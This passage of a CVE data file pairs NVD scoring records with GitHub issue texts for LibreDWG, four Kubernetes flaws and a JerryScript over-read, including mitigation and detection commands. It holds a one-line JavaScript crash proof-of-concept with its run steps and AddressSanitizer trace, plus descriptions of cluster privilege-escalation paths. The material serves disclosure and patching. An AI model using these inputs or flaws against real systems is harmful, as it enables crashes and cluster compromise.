{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/186" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/189" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/190" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:*:*:*:*:*:*:*:*", "matchCriteriaId": "581DFE64-B504-4D86-AAAA-33836C432C53", "versionEndExcluding": "0.11", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/190
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, I got some bugs which you can reproduce `dxf2dwg $PoC -o /dev/null` .Thses bugs work on version `0.10.1.2685` and `earlier`.
Some heap_overflow bug
https://api.github.com/repos/LibreDWG/libredwg/issues/190/comments
5
2020-01-16T11:51:56Z
2020-07-20T02:16:17Z
https://github.com/LibreDWG/libredwg/issues/190
550,758,758
190
CVE-2020-8559
2020-07-22T14:15:16.517
The Kubernetes kube-apiserver in versions v1.6-v1.15, and versions prior to v1.16.13, v1.17.9 and v1.18.6 are vulnerable to an unvalidated redirect on proxied upgrade requests that could allow an attacker to escalate privileges from a node compromise to a full cluster compromise.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 0.9, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 0.5, "impactScore": 5.9, "source": "[email protected]", "type": "Secondary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/92914" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://groups.google.com/d/msg/kubernetes-security-announce/JAIGG5yNROs/19nHQ5wkBwAJ" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200810-0004/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "43222A9D-6D48-490F-8120-349DCE1C1218", "versionEndExcluding": null, "versionEndIncluding": "1.15.0", "versionStartExcluding": null, "versionStartIncluding": "1.6.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "FE1EA8C5-2EF4-4462-B693-FE20B3DF75C6", "versionEndExcluding": "1.16.13", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.16.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "CC1FA454-87A3-480C-BB5E-A23086E2EA99", "versionEndExcluding": "1.17.9", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.17.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "3E4009BA-8220-4B8E-8B4B-1ADA1680DD70", "versionEndExcluding": "1.18.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.18.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/kubernetes/kubernetes/issues/92914
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: Medium (6.4) [CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H) If an attacker is able to intercept certain requests to the Kubelet, they can send a redirect response that may be followed by a client using the credentials from the original request. This can lead to compromise of other nodes. If multiple clusters share the same certificate authority trusted by the client, and the same authentication credentials, this vulnerability may allow an attacker to redirect the client to another cluster. In this configuration, this vulnerability should be considered **High** severity. ### Am I vulnerable? You are only affected by this vulnerability if you treat the node as a security boundary, or if clusters share certificate authorities and authentication credentials. Note that this vulnerability requires an attacker to first compromise a node through separate means. #### Affected Versions - kube-apiserver v1.18.0-1.18.5 - kube-apiserver v1.17.0-1.17.8 - kube-apiserver v1.16.0-1.16.12 - all kube-apiserver versions prior to v1.16.0 ### How do I mitigate this vulnerability? To mitigate this vulnerability you must upgrade the kube-apiserver to a patched version. #### Fixed Versions - kube-apiserver master - fixed by https://github.com/kubernetes/kubernetes/pull/92941 - kube-apiserver v1.18.6 - fixed by https://github.com/kubernetes/kubernetes/pull/92969 - kube-apiserver v1.17.9 - fixed by https://github.com/kubernetes/kubernetes/pull/92970 - kube-apiserver v1.16.13 - fixed by https://github.com/kubernetes/kubernetes/pull/92971 **Fix impact:** Proxied backends (such as an extension API server) that respond to upgrade requests with a non-101 response code may be broken by this patch. To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-management/#upgrading-a-cluster ### Detection Upgrade requests should never respond with a redirect. If any of the following requests have a response code in the 300-399 range, it may be evidence of exploitation. This information can be found in the Kubernetes audit logs. - pods/exec - pods/attach - pods/portforward - any resource: proxy If you find evidence that this vulnerability has been exploited, please contact [email protected] #### Acknowledgements This vulnerability was reported by Wouter ter Maat of Offensi, via the Kubernetes bug bounty. /area security /kind bug /committee product-security /sig api-machinery /area apiserver
CVE-2020-8559: Privilege escalation from compromised node to cluster
https://api.github.com/repos/kubernetes/kubernetes/issues/92914/comments
7
2020-07-08T17:03:16Z
2021-12-02T22:54:32Z
https://github.com/kubernetes/kubernetes/issues/92914
653,456,402
92,914
CVE-2020-8557
2020-07-23T17:15:12.513
The Kubernetes kubelet component in versions 1.1-1.16.12, 1.17.0-1.17.8 and 1.18.0-1.18.5 do not account for disk usage by a pod which writes to its own /etc/hosts file. The /etc/hosts file mounted in a pod by kubelet is not included by the kubelet eviction manager when calculating ephemeral storage usage by a pod. If a pod writes a large amount of data to the /etc/hosts file, it could fill the storage space of the node and cause the node to fail.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 2.1, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Secondary" } ] }
[ { "source": "[email protected]", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/93032" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://groups.google.com/g/kubernetes-security-announce/c/cB_JUsYEKyY/m/vVSO61AhBwAJ" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200821-0002/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "12849C27-DD8A-4D84-92FD-3AB32B43742B", "versionEndExcluding": "1.16.13", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "CC1FA454-87A3-480C-BB5E-A23086E2EA99", "versionEndExcluding": "1.17.9", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.17.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "3E4009BA-8220-4B8E-8B4B-1ADA1680DD70", "versionEndExcluding": "1.18.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.18.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/kubernetes/kubernetes/issues/93032
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: Medium (5.5)  [CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/CR:H/IR:H/AR:M](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/CR:H/IR:H/AR:M) The `/etc/hosts` file mounted in a pod by kubelet is not included by the kubelet eviction manager when calculating ephemeral storage usage by a pod. If a pod writes a large amount of data to the `/etc/hosts` file, it could fill the storage space of the node and cause the node to fail. ### Am I vulnerable? Any clusters allowing pods with sufficient privileges to write to their own `/etc/hosts` files are affected. This includes containers running with `CAP_DAC_OVERRIDE` in their capabilities bounding set (true by default) and either UID 0 (root) or a security context with `allowPrivilegeEscalation: true` (true by default). #### Affected Versions - kubelet v1.18.0-1.18.5 - kubelet v1.17.0-1.17.8 - kubelet < v1.16.13 ### How do I mitigate this vulnerability? Prior to upgrading, this vulnerability can be mitigated by using PodSecurityPolicies or other admission webhooks to force containers to drop CAP_DAC_OVERRIDE or to prohibit privilege escalation and running as root, but these measures may break existing workloads that rely upon these privileges to function properly. #### Fixed Versions - kubelet master - fixed by #92916 - kubelet v1.18.6 - fixed by #92921 - kubelet v1.17.9 - fixed by #92923 - kubelet v1.16.13 - fixed by #92924 To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-management/#upgrading-a-cluster ### Detection Large pod `etc-hosts` files may indicate that a pod is attempting to perform a Denial of Service attack using this bug. A command such as ``` find /var/lib/kubelet/pods/*/etc-hosts -size +1M ``` run on a node can be used to find abnormally large pod etc-hosts files. #### Acknowledgements This vulnerability was reported by Kebe Liu of DaoCloud, via the Kubernetes bug bounty program. /area security /kind bug /committee product-security /sig node /area kubelet
CVE-2020-8557: Node disk DOS by writing to container /etc/hosts
https://api.github.com/repos/kubernetes/kubernetes/issues/93032/comments
3
2020-07-13T18:39:08Z
2021-12-02T22:54:24Z
https://github.com/kubernetes/kubernetes/issues/93032
656,058,152
93,032
CVE-2020-8558
2020-07-27T20:15:12.413
The Kubelet and kube-proxy components in versions 1.1.0-1.16.10, 1.17.0-1.17.6, and 1.18.0-1.18.3 were found to contain a security issue which allows adjacent hosts to reach TCP and UDP services bound to 127.0.0.1 running on the node or in the node's network namespace. Such a service is generally thought to be reachable only by other processes on the same host, but due to this defeect, could be reachable by other hosts on the same LAN as the node, or by containers running on the same node as the service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 6.5, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.5, "source": "[email protected]", "type": "Secondary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Mitigation", "Patch", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/92315" }, { "source": "[email protected]", "tags": [ "Exploit", "Mailing List", "Mitigation", "Third Party Advisory" ], "url": "https://groups.google.com/g/kubernetes-announce/c/sI4KmlH3S2I/m/TljjxOBvBQAJ" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200821-0001/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "9586C74C-1239-4E96-89A6-F618D14EF889", "versionEndExcluding": null, "versionEndIncluding": "1.16.10", "versionStartExcluding": null, "versionStartIncluding": "1.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "F7D0C82A-F13C-4D41-854D-51234D20873E", "versionEndExcluding": null, "versionEndIncluding": "1.17.6", "versionStartExcluding": null, "versionStartIncluding": "1.17.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "FDA694A4-8EC3-47E1-A1F3-CF083D894371", "versionEndExcluding": null, "versionEndIncluding": "1.18.3", "versionStartExcluding": null, "versionStartIncluding": "1.18.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/kubernetes/kubernetes/issues/92315
[ "Exploit", "Mitigation", "Patch", "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: In typical clusters: medium (5.4) [CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) In clusters where API server insecure port has not been disabled: high (8.8) [CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) A security issue was discovered in `kube-proxy` which allows adjacent hosts to reach TCP and UDP services bound to `127.0.0.1` running on the node or in the node's network namespace. For example, if a cluster administrator runs a TCP service on a node that listens on `127.0.0.1:1234`, because of this bug, that service would be potentially reachable by other hosts on the same LAN as the node, or by containers running on the same node as the service. If the example service on port `1234` required no additional authentication (because it assumed that only other localhost processes could reach it), then it could be vulnerable to attacks that make use of this bug. The Kubernetes API Server's default insecure port setting causes the API server to listen on `127.0.0.1:8080` where it will accept requests without authentication. Many Kubernetes installers explicitly disable the API Server's insecure port, but in clusters where it is not disabled, an attacker with access to another system on the same LAN or with control of a container running on the master may be able to reach the API server and execute arbitrary API requests on the cluster. This port is deprecated, and will be removed in Kubernetes v1.20. ### Am I vulnerable? You may be vulnerable if: - You are running a vulnerable version (see below) - Your cluster nodes run in an environment where untrusted hosts share the same layer 2 domain (i.e. same LAN) as nodes - Your cluster allows untrusted pods to run containers with `CAP_NET_RAW` (the Kubernetes default is to allow this capability). - Your nodes (or hostnetwork pods) run any localhost-only services which do not require any further authentication. To list services that are potentially affected, run the following commands on nodes:    - `lsof +c 15 -P -n [email protected] -sTCP:LISTEN`   - `lsof +c 15 -P -n [email protected]` On a master node, an lsof entry like this indicates that the API server may be listening with an insecure port: ``` COMMAND        PID  USER FD   TYPE DEVICE SIZE/OFF NODE NAME kube-apiserver 123  root  7u  IPv4  26799      0t0  TCP 127.0.0.1:8080 (LISTEN) ``` #### Affected Versions - kubelet/kube-proxy v1.18.0-1.18.3 - kubelet/kube-proxy v1.17.0-1.17.6 - kubelet/kube-proxy <=1.16.10 ### How do I mitigate this vulnerability? Prior to upgrading, this vulnerability can be mitigated by manually adding an iptables rule on nodes. This rule will reject traffic to 127.0.0.1 which does not originate on the node. ` iptables -I INPUT --dst 127.0.0.0/8 ! --src 127.0.0.0/8 -m conntrack ! --ctstate RELATED,ESTABLISHED,DNAT -j DROP` Additionally, if your cluster does not already have the API Server insecure port disabled, we strongly suggest that you disable it. Add the following flag to your kubernetes API server command line: `--insecure-port=0` #### Detection Packets on the wire with an IPv4 destination in the range 127.0.0.0/8 and a layer-2 destination MAC address of a node may indicate that an attack is targeting this vulnerability. #### Fixed Versions Although the issue is caused by `kube-proxy`, the current fix for the issue is in `kubelet` (although future versions may have the fix in `kube-proxy` instead). We recommend updating both `kubelet` and `kube-proxy` to be sure the issue is addressed. The following versions contain the fix: - kubelet/kube-proxy master - fixed by #91569 - kubelet/kube-proxy v1.18.4+ - fixed by #92038 - kubelet/kube-proxy v1.17.7+ - fixed by #92039 - kubelet/kube-proxy v1.16.11+ - fixed by #92040 To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-management/#upgrading-a-cluster ## Additional Details This issue was originally raised in issue #90259 which details how the `kube-proxy` sets `net.ipv4.conf.all.route_localnet=1` which causes the system not to reject traffic to localhost which originates on other hosts. IPv6-only services that bind to a `localhost` address are not affected.  There may be additional attack vectors possible in addition to those fixed by #91569 and its cherry-picks. For those attacks to succeed, the target service would need to be UDP and the attack could only rely upon sending UDP datagrams since it wouldn't receive any replies. Finally, the target node would need to have reverse-path filtering disabled for an attack to have any effect. Work is ongoing to determine whether and how this issue should be fixed. See #91666 for up-to-date status on this issue.   #### Acknowledgements This vulnerability was reported by János Kövér, Ericsson with additional impacts reported by Rory McCune, NCC Group and Yuval Avrahami and Ariel Zelivansky, Palo Alto Networks. /area security /kind bug /committee product-security /sig network /sig node /area kubelet
CVE-2020-8558: Node setting allows for neighboring hosts to bypass localhost boundary
https://api.github.com/repos/kubernetes/kubernetes/issues/92315/comments
17
2020-06-19T18:38:58Z
2021-12-02T22:54:39Z
https://github.com/kubernetes/kubernetes/issues/92315
642,156,921
92,315
CVE-2020-8553
2020-07-29T15:15:13.450
The Kubernetes ingress-nginx component prior to version 0.28.0 allows a user with the ability to create namespaces and to read and create ingress objects to overwrite the password file of another ingress which uses nginx.ingress.kubernetes.io/auth-type: basic and which has a hyphenated namespace or secret name.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.9, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 0.7000000000000001, "impactScore": 5.2, "source": "[email protected]", "type": "Primary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 0.7000000000000001, "impactScore": 5.2, "source": "[email protected]", "type": "Secondary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://github.com/kubernetes/ingress-nginx/issues/5126" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:ingress-nginx:*:*:*:*:*:*:*:*", "matchCriteriaId": "60159025-3CB0-40E3-B960-4479582F192F", "versionEndExcluding": "0.28.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/kubernetes/ingress-nginx/issues/5126
[ "Third Party Advisory" ]
github.com
[ "kubernetes", "ingress-nginx" ]
A security issue was discovered in ingress-nginx versions older than v0.28.0. The issue is of medium severity, and upgrading is encouraged to fix the vulnerability. **Am I vulnerable?** The vulnerability exists only if the annotation [nginx.ingress.kubernetes.io/auth-type: basic](https://kubernetes.github.io/ingress-nginx/user-guide/nginx-configuration/annotations/#authentication) is used. **How do I upgrade?** Follow installation instructions [here](https://kubernetes.github.io/ingress-nginx/deploy/upgrade/) **Vulnerability Details** A vulnerability has been discovered where a malicious user could create a new Ingress definition resulting in the replacement of the password file. The vulnerability requires that the victim namespace and/or secret use a hyphen in the name. This scenario requires privileges in the cluster to create and read ingresses and also create secrets. This issue is filed as CVE-2020-8553. /close
CVE-2020-8553: auth-type basic annotation vulnerability
https://api.github.com/repos/kubernetes/ingress-nginx/issues/5126/comments
4
2020-02-19T19:00:32Z
2020-07-30T11:33:35Z
https://github.com/kubernetes/ingress-nginx/issues/5126
567,776,445
5,126
CVE-2020-24344
2020-08-13T19:15:13.740
JerryScript through 2.3.0 has a (function({a=arguments}){const arguments}) buffer over-read.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.2, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3976" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:*:*:*:*:*:*:*:*", "matchCriteriaId": "01F91CD4-9EFF-4338-A18E-64F109090995", "versionEndExcluding": null, "versionEndIncluding": "2.3.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jerryscript-project/jerryscript/issues/3976
[ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
### JerryScript revision git hash: 392ee717128f6daaf0b94e54fc9512eb26d680e2 ### Test case ```javascript ( function ( { a = arguments }) { const arguments } ) ``` In debug build, it triggers an assertion 'scope_stack_p > context_p->scope_stack_p' failed ### Execution steps ./jerry poc.js ### Build cmd python tools/build.py --compile-flag="-fsanitize=address" Stack dump: --- ``` ================================================================= ==59856==ERROR: AddressSanitizer: global-buffer-overflow on address 0x5581992ba27c at pc 0x558198ef79cd bp 0x7ffffcf5f490 sp 0x7ffffcf5f480 READ of size 2 at 0x5581992ba27c thread T0 #0 0x558198ef79cc (/home/yongheng/jerry_clean/build/bin/jerry+0x2d9cc) #1 0x558198f263d7 (/home/yongheng/jerry_clean/build/bin/jerry+0x5c3d7) #2 0x558198f81326 (/home/yongheng/jerry_clean/build/bin/jerry+0xb7326) #3 0x558198f34f6c (/home/yongheng/jerry_clean/build/bin/jerry+0x6af6c) #4 0x558198eff1a3 (/home/yongheng/jerry_clean/build/bin/jerry+0x351a3) #5 0x558198f030ca (/home/yongheng/jerry_clean/build/bin/jerry+0x390ca) #6 0x558198f3dbcb (/home/yongheng/jerry_clean/build/bin/jerry+0x73bcb) #7 0x558198f3f19c (/home/yongheng/jerry_clean/build/bin/jerry+0x7519c) #8 0x558198f2f238 (/home/yongheng/jerry_clean/build/bin/jerry+0x65238) #9 0x558198f33ac8 (/home/yongheng/jerry_clean/build/bin/jerry+0x69ac8) #10 0x558198f3c101 (/home/yongheng/jerry_clean/build/bin/jerry+0x72101) #11 0x558198f0484d (/home/yongheng/jerry_clean/build/bin/jerry+0x3a84d) #12 0x558198f0515a (/home/yongheng/jerry_clean/build/bin/jerry+0x3b15a) #13 0x558198f745c0 (/home/yongheng/jerry_clean/build/bin/jerry+0xaa5c0) #14 0x558198ee044e (/home/yongheng/jerry_clean/build/bin/jerry+0x1644e) #15 0x7f2eec31db96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #16 0x558198ee1219 (/home/yongheng/jerry_clean/build/bin/jerry+0x17219) ``` ---
Heap overflow in jerry-core
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3976/comments
14
2020-07-05T20:43:50Z
